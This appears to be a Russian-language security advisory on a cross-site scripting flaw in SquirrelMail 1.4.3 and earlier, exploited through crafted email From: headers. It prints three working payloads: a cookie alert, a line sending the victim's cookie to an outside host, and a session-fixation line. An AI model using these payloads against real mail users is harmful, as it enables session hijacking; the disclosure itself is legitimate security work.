Программа: SquirrelMail до версии 1.4.3; 1.5.1 

Уязвимость обнаружена в SquirrelMail. Удаленный пользователь может выполнить XSS нападение.
Удаленный пользователь может послать специально сформированное email сообщение к целевому пользователю, чтобы выполнить произвольный код сценария в браузере пользователя, просматривающего злонамеренное сообщение. 

Пример: 

From:<!--<>(-->John Doe<script>window.alert( document.cookie);</scrip t><>

From:(<!--(--><script>document.location=' http://www.rs-labs.com/?'+document.cookie;</script><>

From:<!--<>(-->John Doe<script>document.cookie= 'PHPSESSID=xxx; path=/';</script><>

Оставить мнение